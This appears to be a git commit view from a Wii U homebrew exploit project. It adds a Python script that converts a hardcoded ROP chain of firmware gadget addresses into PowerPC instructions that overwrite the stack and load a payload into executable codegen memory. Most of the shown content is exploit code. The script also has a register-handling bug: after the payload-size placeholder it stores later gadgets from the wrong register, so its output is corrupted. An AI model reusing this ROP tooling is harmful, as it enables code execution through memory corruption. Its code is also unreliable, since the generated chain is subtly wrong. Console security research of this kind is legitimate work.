jam1garner 1 year ago
parent
commit
906b93b0f0

build_codeloader.bat → miniloader/build_codeloader.bat View File


codeloader.bin → miniloader/codeloader.bin View File


codeloader.o → miniloader/codeloader.o View File


codeloader.s → miniloader/codeloader.s View File


+ 40
- 0
miniloader/ropChainToAsm.py View File

@@ -0,0 +1,40 @@
1
+# Assemble rop chain into semi-optimized ppc to write over the stack
2
+# ROP chain based on yellows8's wiiuhaxx_common for loading into codegen
3
+# FFFF2222 is a stand in for the payload load address (stored in r7)
4
+# FFFF3333 is a stand in for the payload size (stored in r11)
5
+# place at "found:" in codeloader.s
6
+
7
+
8
+#This ROP chain was created using:
9
+# ropgen_copycodebin_to_codegen(0x01800000, 0xFFFF2222, 0xFFFF3333)
10
+# ropchain_appendu32(0x01800000)
11
+# in ropchainBuilder.html
12
+ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
13
+ropChainAddresses = []
14
+for i in ropChain:
15
+    if not i in ropChainAddresses:
16
+        ropChainAddresses.append(i)
17
+
18
+# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
19
+# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size
20
+writeRegister = ''
21
+for address in ropChainAddresses:
22
+    if address == 'FFFF2222':
23
+        writeRegister = 'r7'
24
+    elif address == 'FFFF3333':
25
+        writeRegister = 'r11'
26
+    elif address[:4] == '0000':
27
+        print('li r10, 0x'+address[4:])
28
+        writeRegister = 'r10'
29
+    else:
30
+        print('lis r10, 0x'+address[:4])
31
+        if address[4:] != "0000":
32
+            print('ori r10, r10, 0x'+address[4:])
33
+
34
+    last = ropChain.index(address)
35
+    while last != -1:
36
+        print('stw %s, 0x%X(r1)' % (writeRegister, last * 4))
37
+        try:
38
+            last = ropChain.index(address, last+1)
39
+        except ValueError:
40
+            last = -1

ropchainBuilder.html → miniloader/ropchainBuilder.html View File